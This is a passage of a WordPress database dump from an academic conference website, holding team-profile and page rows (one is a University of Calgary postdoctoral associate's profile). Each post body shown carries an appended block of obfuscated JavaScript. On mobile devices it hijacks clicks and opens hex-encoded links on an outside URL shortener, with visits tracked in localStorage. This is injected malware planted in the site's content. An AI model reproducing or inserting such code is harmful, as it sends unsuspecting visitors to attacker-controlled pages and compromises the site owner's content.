0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Local Scientific Committee','','inherit','closed','closed','','3554-revision-v1','','','2023-01-14 22:02:34','2023-01-14 22:02:34','',3554,'https://gsw2023.com/?p=3604',0,'revision','',0),
(3606,1,'2023-01-22 03:31:50','2023-01-22 03:31:50','<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><!-- wp:paragraph -->\n<p>Postdoctoral Associate </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Department of Geomatics Engineering </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>University of Calgary, Calgary, Canada</p>\n<!-- /wp:paragraph --></blockquote>\n<!-- /wp:quote --></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></blockquote>\n<!-- /wp:quote -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','DR Mengchi Ai ','','publish','closed','closed','','dr-mengchi-ai','','','2023-01-22 03:38:37','2023-01-22 03:38:37','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3606',0,'dt_team','',0),
(3607,1,'2023-01-22 03:30:54','2023-01-22 03:30:54','','Mengchi_Ai','','inherit','open','closed','','mengchi_ai','','','2023-01-22 03:30:54','2023-01-22 03:30:54','',3606,'https://gsw2023.com/wp-content/uploads/2023/01/Mengchi_Ai.jpg',0,'attachment','image/jpeg',0),
(3608,1,'2023-01-22 03:31:12','2023-01-22 03:31:12','','Mengchi_Ai','','inherit','open','closed','','mengchi_ai-2','','','2023-01-22 03:31:12','2023-01-22 03:31:12','',3606,'https://gsw2023.com/wp-content/uploads/2023/01/Mengchi_Ai-1.jpg',0,'attachment','image/jpeg',0),
(3609,1,'2023-01-22 03:34:02','2023-01-22 03:34:02','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55, 56, 57, 58, 59, 60, 61, 63, 64, 65, 62, 67\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 